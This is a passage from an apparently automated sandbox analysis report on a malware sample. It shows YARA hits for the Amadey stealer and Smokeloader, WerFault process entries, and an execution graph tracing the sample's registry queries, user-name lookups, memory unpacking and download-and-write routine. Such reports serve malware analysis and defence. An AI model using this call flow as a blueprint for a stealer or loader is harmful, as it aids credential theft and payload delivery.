                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000021.00000002.2878258243.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                  Has exited:true

                  General

                  Target ID:35
                  Start time:11:36:01
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:37
                  Start time:11:36:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:39
                  Start time:11:36:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.5%
                    Dynamic/Decrypted Code Coverage:4.3%
                    Signature Coverage:26.6%
                    Total number of Nodes:647
                    Total number of Limit Nodes:19
                    execution_graph 58232 408750 58233 408756 58232->58233 58239 436839 58233->58239 58235 408776 58238 408770 58255 436782 58239->58255 58242 4368c7 58243 4368d3 __FrameHandler3::FrameUnwindToState 58242->58243 58244 4368f2 58243->58244 58245 4368dd 58243->58245 58253 4368ed 58244->58253 58312 438e02 EnterCriticalSection 58244->58312 58310 437623 14 API calls __dosmaperr 58245->58310 58247 4368e2 58311 436d6a 25 API calls __cftof 58247->58311 58249 43690f 58313 436850 65 API calls 4 library calls 58249->58313 58252 43691a 58314 436941 LeaveCriticalSection ___scrt_uninitialize_crt 58252->58314 58253->58238 58258 43678e __FrameHandler3::FrameUnwindToState 58255->58258 58256 436795 58280 437623 14 API calls __dosmaperr 58256->58280 58258->58256 58260 4367b5 58258->58260 58259 43679a 58281 436d6a 25 API calls __cftof 58259->58281 58262 4367c7 58260->58262 58263 4367ba 58260->58263 58272 43a963 58262->58272 58282 437623 14 API calls __dosmaperr 58263->58282 58267 4367d7 58283 437623 14 API calls __dosmaperr 58267->58283 58268 4367e4 58284 436822 LeaveCriticalSection ___scrt_uninitialize_crt 58268->58284 58271 408763 58271->58235 58271->58242 58273 43a96f __FrameHandler3::FrameUnwindToState 58272->58273 58285 438e6b EnterCriticalSection 58273->58285 58275 43a97d 58286 43aa07 58275->58286 58280->58259 58281->58271 58282->58271 58283->58271 58284->58271 58285->58275 58293 43aa2a 58286->58293 58287 43a98a 58300 43a9c3 58287->58300 58288 43aa82 58305 43d8d2 14 API calls 2 library calls 58288->58305 58290 43aa8b 58306 43ae95 14 API calls __dosmaperr 58290->58306 58293->58287 58293->58288 58303 438e02 EnterCriticalSection 58293->58303 58304 438e16 LeaveCriticalSection 58293->58304 58294 43aa94 58294->58287 58307 43b561 6 API calls __dosmaperr 58294->58307 58297 43aab3 58308 438e02 EnterCriticalSection 58297->58308 58299 43aac6 58299->58287 58309 438eb3 LeaveCriticalSection 58300->58309 58302 4367d0 58302->58267 58302->58268 58303->58293 58304->58293 58305->58290 58306->58294 58307->58297 58308->58299 58309->58302 58310->58247 58311->58253 58312->58249 58313->58252 58314->58253 58315 43acf3 58320 43aac9 58315->58320 58318 43ad32 58321 43aae8 58320->58321 58322 43aafb 58321->58322 58330 43ab10 58321->58330 58340 437623 14 API calls __dosmaperr 58322->58340 58324 43ab00 58341 436d6a 25 API calls __cftof 58324->58341 58326 43ab0b 58326->58318 58337 441b3c 58326->58337 58328 43ace1 58346 436d6a 25 API calls __cftof 58328->58346 58335 43ac30 58330->58335 58342 4413cb 37 API calls 2 library calls 58330->58342 58332 43ac80 58332->58335 58343 4413cb 37 API calls 2 library calls 58332->58343 58334 43ac9e 58334->58335 58344 4413cb 37 API calls 2 library calls 58334->58344 58335->58326 58345 437623 14 API calls __dosmaperr 58335->58345 58347 441501 58337->58347 58340->58324 58341->58326 58342->58332 58343->58334 58344->58335 58345->58328 58346->58326 58350 44150d __FrameHandler3::FrameUnwindToState 58347->58350 58348 441514 58367 437623 14 API calls __dosmaperr 58348->58367 58350->58348 58352 44153f 58350->58352 58351 441519 58368 436d6a 25 API calls __cftof 58351->58368 58358 441ace 58352->58358 58357 441523 58357->58318 58370 436a9d 58358->58370 58364 441563 58369 441596 LeaveCriticalSection __wsopen_s 58364->58369 58365 441b04 58365->58364 58425 43ae95 14 API calls __dosmaperr 58365->58425 58367->58351 58368->58357 58369->58357 58426 436a1a 58370->58426 58373 436ac1 58375 4369fd 58373->58375 58438 43694b 58375->58438 58378 441b5c 58463 4418aa 58378->58463 58381 441ba7 58481 43beeb 58381->58481 58382 441b8e 58495 437610 14 API calls __dosmaperr 58382->58495 58385 441b93 58496 437623 14 API calls __dosmaperr 58385->58496 58387 441bb5 58497 437610 14 API calls __dosmaperr 58387->58497 58388 441bcc 58494 441815 CreateFileW 58388->58494 58392 441bba 58498 437623 14 API calls __dosmaperr 58392->58498 58394 441c82 GetFileType 58395 441cd4 58394->58395 58396 441c8d GetLastError 58394->58396 58503 43be36 15 API calls 2 library calls 58395->58503 58501 4375ed 14 API calls __dosmaperr 58396->58501 58397 441c57 GetLastError 58500 4375ed 14 API calls __dosmaperr 58397->58500 58399 441c05 58399->58394 58399->58397 58499 441815 CreateFileW 58399->58499 58401 441c9b CloseHandle 58401->58385 58403 441cc4 58401->58403 58502 437623 14 API calls __dosmaperr 58403->58502 58405 441c4a 58405->58394 58405->58397 58407 441cf5 58409 441d41 58407->58409 58504 441a24 71 API calls 2 library calls 58407->58504 58408 441cc9 58408->58385 58413 441d48 58409->58413 58506 4415c2 71 API calls 3 library calls 58409->58506 58412 441d76 58412->58413 58414 441d84 58412->58414 58505 43afe8 28 API calls 2 library calls 58413->58505 58416 441ba0 58414->58416 58417 441e00 CloseHandle 58414->58417 58416->58365 58507 441815 CreateFileW 58417->58507 58419 441e2b 58420 441e35 GetLastError 58419->58420 58424 441d4f 58419->58424 58508 4375ed 14 API calls __dosmaperr 58420->58508 58422 441e41 58509 43bffe 15 API calls 2 library calls 58422->58509 58424->58416 58425->58364 58427 436a31 58426->58427 58428 436a3a 58426->58428 58427->58373 58434 43b3a7 5 API calls _unexpected 58427->58434 58428->58427 58435 43a711 37 API calls 3 library calls 58428->58435 58430 436a5a 58436 43b69b 37 API calls __cftof 58430->58436 58432 436a70 58437 43b6c8 37 API calls __cftof 58432->58437 58434->58373 58435->58430 58436->58432 58437->58427 58439 436973 58438->58439 58440 436959 58438->58440 58442 43697a 58439->58442 58443 436999 58439->58443 58456 436adc 14 API calls _free 58440->58456 58455 436963 58442->58455 58457 436af6 15 API calls _unexpected 58442->58457 58458 43b139 MultiByteToWideChar 58443->58458 58446 4369a8 58447 4369af GetLastError 58446->58447 58449 4369d5 58446->58449 58461 436af6 15 API calls _unexpected 58446->58461 58459 4375ed 14 API calls __dosmaperr 58447->58459 58449->58455 58462 43b139 MultiByteToWideChar 58449->58462 58451 4369bb 58460 437623 14 API calls __dosmaperr 58451->58460 58453 4369ec 58453->58447 58453->58455 58455->58365 58455->58378 58456->58455 58457->58455 58458->58446 58459->58451 58460->58455 58461->58449 58462->58453 58464 4418e5 58463->58464 58465 4418cb 58463->58465 58510 44183a 58464->58510 58465->58464 58517 437623 14 API calls __dosmaperr 58465->58517 58468 4418da 58518 436d6a 25 API calls __cftof 58468->58518 58470 44191d 58471 44194c 58470->58471 58519 437623 14 API calls __dosmaperr 58470->58519 58479 44199f 58471->58479 58521 439c01 25 API calls 2 library calls 58471->58521 58474 44199a 58477 441a17 58474->58477 58474->58479 58475 441941 58520 436d6a 25 API calls __cftof 58475->58520 58522 436d97 11 API calls __FrameHandler3::FrameUnwindToState 58477->58522 58479->58381 58479->58382 58480 441a23 58482 43bef7 __FrameHandler3::FrameUnwindToState 58481->58482 58525 438e6b EnterCriticalSection 58482->58525 58484 43befe 58486 43bf23 58484->58486 58490 43bf92 EnterCriticalSection 58484->58490 58491 43bf45 58484->58491 58529 43bcc5 15 API calls 3 library calls 58486->58529 58489 43bf28 58489->58491 58530 43be13 EnterCriticalSection 58489->58530 58490->58491 58492 43bf9f LeaveCriticalSection 58490->58492 58526 43bff5 58491->58526 58492->58484 58494->58399 58495->58385 58496->58416 58497->58392 58498->58385 58499->58405 58500->58385 58501->58401 58502->58408 58503->58407 58504->58409 58505->58424 58506->58412 58507->58419 58508->58422 58509->58424 58512 441852 58510->58512 58511 44186d 58511->58470 58512->58511 58523 437623 14 API calls __dosmaperr 58512->58523 58514 441891 58524 436d6a 25 API calls __cftof 58514->58524 58516 44189c 58516->58470 58517->58468 58518->58464 58519->58475 58520->58471 58521->58474 58522->58480 58523->58514 58524->58516 58525->58484 58531 438eb3 LeaveCriticalSection 58526->58531 58528 43bf65 58528->58387 58528->58388 58529->58489 58530->58491 58531->58528 58532 40c8a0 58533 40c8f7 58532->58533 58534 40c8df 58532->58534 58533->58534 58546 418ef0 26 API calls 5 library calls 58533->58546 58536 40c91b 58534->58536 58537 40c948 SHFileOperationA 58534->58537 58547 418ef0 26 API calls 5 library calls 58534->58547 58536->58537 58539 40c99e ISource 58537->58539 58541 40ca24 58539->58541 58542 40c9fe ISource 58539->58542 58555 436d7a 58541->58555 58548 41d101 58542->58548 58543 40ca20 58546->58534 58547->58537 58549 41d10a 58548->58549 58550 41d10c IsProcessorFeaturePresent 58548->58550 58549->58543 58552 41d333 58550->58552 58560 41d2f7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 58552->58560 58554 41d416 58554->58543 58561 436d06 25 API calls 2 library calls 58555->58561 58557 436d89 58562 436d97 11 API calls __FrameHandler3::FrameUnwindToState 58557->58562 58559 436d96 58560->58554 58561->58557 58562->58559 58563 407da0 58642 434200 58563->58642 58566 407e28 58644 417a50 58566->58644 58567 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58569 408335 58567->58569 58570 407e37 58660 405bc0 58570->58660 58572 407e42 58573 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58572->58573 58574 407e64 58573->58574 58575 405bc0 36 API calls 58574->58575 58576 407e6f GetModuleHandleA GetProcAddress 58575->58576 58578 407e95 ISource 58576->58578 58579 407f16 ISource 58578->58579 58582 40833c 58578->58582 58580 407f43 GetNativeSystemInfo 58579->58580 58581 407f47 GetSystemInfo 58579->58581 58586 407f4d 58580->58586 58581->58586 58583 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58582->58583 58584 408341 58583->58584 58585 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58584->58585 58587 408346 58585->58587 58588 408089 58586->58588 58589 407faf 58586->58589 58612 407f58 ISource 58586->58612 58590 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58588->58590 58591 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58589->58591 58592 4080b5 58590->58592 58593 407fd0 58591->58593 58594 405bc0 36 API calls 58592->58594 58595 405bc0 36 API calls 58593->58595 58597 4080bc 58594->58597 58596 407fd7 58595->58596 58598 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58596->58598 58599 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58597->58599 58600 407fef 58598->58600 58601 4080d4 58599->58601 58602 405bc0 36 API calls 58600->58602 58603 405bc0 36 API calls 58601->58603 58605 407ff6 58602->58605 58604 4080db 58603->58604 58606 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58604->58606 58712 438c61 40 API calls 58605->58712 58608 40810c 58606->58608 58610 405bc0 36 API calls 58608->58610 58609 408021 58609->58584 58609->58612 58611 408113 58610->58611 58713 4056e0 26 API calls 3 library calls 58611->58713 58612->58567 58614 408122 58615 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58614->58615 58616 40815d 58615->58616 58617 405bc0 36 API calls 58616->58617 58618 408164 58617->58618 58619 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58618->58619 58620 40817c 58619->58620 58621 405bc0 36 API calls 58620->58621 58622 408183 58621->58622 58623 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58622->58623 58624 4081b4 58623->58624 58625 405bc0 36 API calls 58624->58625 58626 4081bb 58625->58626 58714 4056e0 26 API calls 3 library calls 58626->58714 58628 4081ca 58629 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58628->58629 58630 408205 58629->58630 58631 405bc0 36 API calls 58630->58631 58632 40820c 58631->58632 58633 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58632->58633 58634 408224 58633->58634 58635 405bc0 36 API calls 58634->58635 58636 40822b 58635->58636 58637 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58636->58637 58638 40825c 58637->58638 58639 405bc0 36 API calls 58638->58639 58640 408263 58639->58640 58715 4056e0 26 API calls 3 library calls 58640->58715 58643 407e06 GetVersionExW 58642->58643 58643->58566 58643->58612 58645 417a76 58644->58645 58646 417a7d 58645->58646 58647 417ad1 58645->58647 58648 417ab2 58645->58648 58646->58570 58656 417ac6 std::_Rethrow_future_exception 58647->58656 58717 402440 26 API calls 3 library calls 58647->58717 58649 417b09 58648->58649 58650 417ab9 58648->58650 58718 402440 26 API calls 3 library calls 58649->58718 58716 402440 26 API calls 3 library calls 58650->58716 58654 417abf 58655 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58654->58655 58654->58656 58657 417b13 58655->58657 58656->58570 58659 417b41 __Cnd_destroy_in_situ ISource __Mtx_destroy_in_situ Concurrency::details::_TaskCollection::~_TaskCollection 58657->58659 58719 41bb16 EnterCriticalSection LeaveCriticalSection Concurrency::details::_CancellationTokenState::_RegisterCallback 58657->58719 58659->58570 58720 4058f0 58660->58720 58662 405c04 58723 404b90 58662->58723 58664 405c2b 58665 405cc7 ISource 58664->58665 58667 405cf2 58664->58667 58666 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58665->58666 58668 405ce9 58666->58668 58669 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58667->58669 58668->58572 58670 405cf7 StructuredWorkStealingQueue 58669->58670 58671 405d57 RegOpenKeyExA 58670->58671 58672 405db0 RegCloseKey 58671->58672 58673 405dd6 58672->58673 58673->58673 58734 418110 58673->58734 58675 405e56 ISource 58677 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58675->58677 58676 405dee 58676->58675 58678 405e7d 58676->58678 58679 405e79 58677->58679 58680 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58678->58680 58679->58572 58681 405e82 RegOpenKeyExA 58680->58681 58683 405ef7 RegCloseKey 58681->58683 58685 405f34 58683->58685 58684 405fae ISource 58686 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58684->58686 58685->58684 58687 405fc6 58685->58687 58688 405fc2 58686->58688 58689 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58687->58689 58688->58572 58690 405fcb __wsopen_s 58689->58690 58691 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58690->58691 58692 406039 58691->58692 58693 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58692->58693 58694 40606d 58693->58694 58695 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58694->58695 58696 40609e 58695->58696 58697 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58696->58697 58698 4060cf 58697->58698 58699 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58698->58699 58700 406100 RegOpenKeyExA 58699->58700 58702 406518 58700->58702 58701 406618 ISource 58703 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58701->58703 58702->58701 58704 40663e 58702->58704 58705 40663a 58703->58705 58706 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58704->58706 58705->58572 58707 406643 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 58706->58707 58709 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58707->58709 58710 406716 58709->58710 58711 405bc0 28 API calls 58710->58711 58712->58609 58713->58614 58714->58628 58715->58612 58716->58654 58717->58656 58718->58654 58719->58659 58749 417fd0 26 API calls 4 library calls 58720->58749 58722 40591b 58722->58662 58724 404bc4 58723->58724 58725 404bee 58723->58725 58726 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58724->58726 58750 417fd0 26 API calls 4 library calls 58725->58750 58727 404bdb 58726->58727 58728 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58727->58728 58730 404bea 58728->58730 58730->58664 58731 404c4b 58732 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58731->58732 58733 404d86 58732->58733 58733->58664 58737 41812e CatchIt 58734->58737 58739 418154 58734->58739 58735 41823e 58753 419380 26 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 58735->58753 58737->58676 58738 418243 58754 402440 26 API calls 3 library calls 58738->58754 58739->58735 58740 4181a8 58739->58740 58741 4181cd 58739->58741 58740->58738 58751 402440 26 API calls 3 library calls 58740->58751 58747 4181b9 std::_Rethrow_future_exception 58741->58747 58752 402440 26 API calls 3 library calls 58741->58752 58743 418248 58746 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58746->58735 58747->58746 58748 418220 ISource 58747->58748 58748->58676 58749->58722 58750->58731 58751->58747 58752->58747 58754->58743 58755 44c003c 58756 44c0049 58755->58756 58770 44c0e0f SetErrorMode SetErrorMode 58756->58770 58761 44c0265 58762 44c02ce VirtualProtect 58761->58762 58764 44c030b 58762->58764 58763 44c0439 VirtualFree 58768 44c04be 58763->58768 58769 44c05f4 LoadLibraryA 58763->58769 58764->58763 58765 44c04e3 LoadLibraryA 58765->58768 58767 44c08c7 58768->58765 58768->58769 58769->58767 58771 44c0223 58770->58771 58772 44c0d90 58771->58772 58773 44c0dad 58772->58773 58774 44c0dbb GetPEB 58773->58774 58775 44c0238 VirtualAlloc 58773->58775 58774->58775 58775->58761 58776 408782 58777 408786 58776->58777 58778 408788 GetFileAttributesA 58776->58778 58777->58778 58779 408794 58778->58779 58780 41d872 58781 41d87e __FrameHandler3::FrameUnwindToState 58780->58781 58806 41d598 58781->58806 58783 41d885 58784 41d9de 58783->58784 58794 41d8af ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 58783->58794 58829 41dcb5 4 API calls 2 library calls 58784->58829 58786 41d9e5 58830 436739 58786->58830 58790 41d9f3 58791 41d8ce 58792 41d94f 58814 43965d 58792->58814 58794->58791 58794->58792 58828 436713 59 API calls 4 library calls 58794->58828 58796 41d955 58818 416d80 58796->58818 58807 41d5a1 58806->58807 58834 41dea1 IsProcessorFeaturePresent 58807->58834 58809 41d5ad 58835 4348d4 10 API calls 2 library calls 58809->58835 58811 41d5b2 58813 41d5b6 58811->58813 58836 4348f3 7 API calls 2 library calls 58811->58836 58813->58783 58815 43966b 58814->58815 58816 439666 58814->58816 58815->58796 58837 4393c1 49 API calls 58816->58837 58819 416d8b 58818->58819 58838 40cdf0 58819->58838 58821 416d95 58822 40d680 37 API calls 58821->58822 58823 416d9a 58822->58823 58824 414f70 77 API calls 58823->58824 58825 416d9f 58824->58825 58826 416d30 CreateThread CreateThread CreateThread 58825->58826 58827 416d70 Sleep 58826->58827 58827->58827 58828->58792 58829->58786 58843 4365d7 58830->58843 58833 4366fd 23 API calls __FrameHandler3::FrameUnwindToState 58833->58790 58834->58809 58835->58811 58836->58813 58837->58815 58839 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58838->58839 58840 40ce42 58839->58840 58841 405bc0 36 API calls 58840->58841 58842 40ce4d 58841->58842 58844 4365f7 58843->58844 58845 4365e5 58843->58845 58855 43647e 58844->58855 58871 41ddd7 GetModuleHandleW 58845->58871 58849 4365ea 58849->58844 58872 43667d GetModuleHandleExW 58849->58872 58850 41d9eb 58850->58833 58853 43663a 58856 43648a __FrameHandler3::FrameUnwindToState 58855->58856 58878 438e6b EnterCriticalSection 58856->58878 58858 436494 58879 4364ea 58858->58879 58860 4364a1 58883 4364bf 58860->58883 58863 43663b 58888 43a3a2 GetPEB 58863->58888 58866 43666a 58869 43667d __FrameHandler3::FrameUnwindToState 3 API calls 58866->58869 58867 43664a GetPEB 58867->58866 58868 43665a GetCurrentProcess TerminateProcess 58867->58868 58868->58866 58870 436672 ExitProcess 58869->58870 58871->58849 58873 4366bf 58872->58873 58874 43669c GetProcAddress 58872->58874 58875 4366c5 FreeLibrary 58873->58875 58876 4365f6 58873->58876 58877 4366b1 58874->58877 58875->58876 58876->58844 58877->58873 58878->58858 58880 4364f6 __FrameHandler3::FrameUnwindToState 58879->58880 58882 436557 __FrameHandler3::FrameUnwindToState 58880->58882 58886 439945 14 API calls __FrameHandler3::FrameUnwindToState 58880->58886 58882->58860 58887 438eb3 LeaveCriticalSection 58883->58887 58885 4364ad 58885->58850 58885->58863 58886->58882 58887->58885 58889 43a3bc 58888->58889 58891 436645 58888->58891 58892 43b367 5 API calls __dosmaperr 58889->58892 58891->58866 58891->58867 58892->58891 58893 40d109 GetModuleFileNameA 58894 40d141 58893->58894 58894->58894 58895 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58894->58895 58896 40d15d 58895->58896 58897 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58896->58897 58898 40d170 58897->58898 58899 405bc0 36 API calls 58898->58899 58900 40d17b 58899->58900 58902 40d1a4 58900->58902 59022 419050 26 API calls 4 library calls 58900->59022 58941 418270 58902->58941 58904 40d52c 58905 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58904->58905 58907 40d531 58905->58907 58906 40d22a ISource 58906->58904 58908 40d3f1 ISource 58906->58908 58909 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58907->58909 58910 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58908->58910 58913 40d495 ISource 58908->58913 58917 40d536 58909->58917 58912 40d430 58910->58912 58911 40d4fa ISource 58914 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58911->58914 58915 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58912->58915 58913->58907 58913->58911 58918 40d51b 58914->58918 58916 40d45c 58915->58916 58919 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58916->58919 58920 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58917->58920 58921 40d477 58919->58921 58922 40d58d 58920->58922 58923 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58921->58923 58924 405bc0 36 API calls 58922->58924 58925 40d48c 58923->58925 58926 40d595 58924->58926 58949 40b170 GetUserNameA 58925->58949 58928 418270 26 API calls 58926->58928 58929 40d5a5 58928->58929 58930 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58929->58930 58931 40d5c0 58930->58931 58932 405bc0 36 API calls 58931->58932 58933 40d5c7 58932->58933 58934 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58933->58934 58935 40d5dc 58934->58935 58936 405bc0 36 API calls 58935->58936 58937 40d5e3 ISource 58936->58937 58938 40d65a ISource 58937->58938 58939 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58937->58939 58940 40d679 58939->58940 58942 4182e2 58941->58942 58943 418298 58941->58943 58946 4182f1 CatchIt 58942->58946 59024 419050 26 API calls 4 library calls 58942->59024 58943->58942 58944 4182a1 58943->58944 59023 419390 26 API calls 2 library calls 58944->59023 58946->58906 58948 4182aa 58948->58906 58950 40b1e7 58949->58950 58950->58950 58951 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58950->58951 58952 40b203 58951->58952 58953 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58952->58953 58954 40b2ad 58953->58954 58955 40b37d CoInitialize 58954->58955 58956 40b3a1 CoCreateInstance 58955->58956 58971 40b3ca ISource 58955->58971 58957 40b750 58956->58957 58958 40b3c4 CoUninitialize 58956->58958 58959 40b776 58957->58959 58969 40b81b StructuredWorkStealingQueue 58957->58969 58958->58971 58963 40b792 CoUninitialize 58959->58963 58964 40b7a9 CoUninitialize 58959->58964 58959->58971 58960 40b9b2 58961 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58960->58961 58962 40b9b7 58961->58962 58965 40ba16 CoInitialize 58962->58965 58963->58971 58966 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58964->58966 58967 40ba31 CoCreateInstance 58965->58967 58968 40ba57 ISource 58965->58968 58970 40b7c3 58966->58970 58972 40ba51 CoUninitialize 58967->58972 58983 40bad7 58967->58983 58978 40bb5a 58968->58978 58981 40bad5 ISource 58968->58981 58992 40b89c GetLocalTime 58969->58992 58973 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58970->58973 58971->58960 58977 40b74b ISource 58971->58977 58972->58968 58974 40b7db 58973->58974 58975 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58974->58975 58979 40b7f3 58975->58979 58976 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58980 40b9ae 58976->58980 58977->58976 58986 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58978->58986 58984 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58979->58984 58980->58913 58982 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58981->58982 58985 40bb56 58982->58985 58983->58968 58990 40bb10 CoUninitialize 58983->58990 58991 40bb24 CoUninitialize 58983->58991 58987 40b805 58984->58987 58985->58913 58988 40bb5f 58986->58988 58989 40b170 45 API calls 58987->58989 58995 40bba6 StructuredWorkStealingQueue 58988->58995 58997 40bd50 ISource 58988->58997 58989->58971 58993 40bb1f 58990->58993 58991->58968 59007 40b93b CoUninitialize 58992->59007 58993->58968 58994 40bdba ISource 58998 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 58994->58998 58999 40bbc6 CreateFileA InternetOpenA InternetOpenUrlA InternetReadFile 58995->58999 58996 40bdec 59000 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58996->59000 58997->58994 58997->58996 59001 40bdde 58998->59001 59002 40bc67 CloseHandle InternetCloseHandle InternetCloseHandle 58999->59002 59003 40bc38 58999->59003 59004 40bdf1 59000->59004 59001->58913 59005 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59002->59005 59003->59002 59006 40bc47 WriteFile InternetReadFile 59003->59006 59009 40bc8a 59005->59009 59006->59002 59006->59003 59007->58971 59010 40bcd5 ISource 59009->59010 59013 40bde2 59009->59013 59011 40bd3b ISource 59010->59011 59025 436b54 42 API calls 2 library calls 59010->59025 59011->58997 59014 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59013->59014 59016 40bde7 59014->59016 59015 40bcf4 59026 406de0 26 API calls 2 library calls 59015->59026 59018 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59016->59018 59018->58996 59019 40bd02 RemoveDirectoryA 59019->59011 59021 40bd19 59019->59021 59021->59011 59021->59016 59022->58902 59023->58948 59024->58946 59025->59015 59026->59019 59027 295fbce 59028 295fbdd 59027->59028 59031 296036e 59028->59031 59037 2960389 59031->59037 59032 2960392 CreateToolhelp32Snapshot 59033 29603ae Module32First 59032->59033 59032->59037 59034 295fbe6 59033->59034 59035 29603bd 59033->59035 59038 296002d 59035->59038 59037->59032 59037->59033 59039 2960058 59038->59039 59040 29600a1 59039->59040 59041 2960069 VirtualAlloc 59039->59041 59040->59040 59041->59040 59042 40d74c 59043 40d757 59042->59043 59044 40d77c ISource 59042->59044 59043->59044 59045 40db1a 59043->59045 59047 40d8b5 GetModuleFileNameA 59044->59047 59046 436d7a 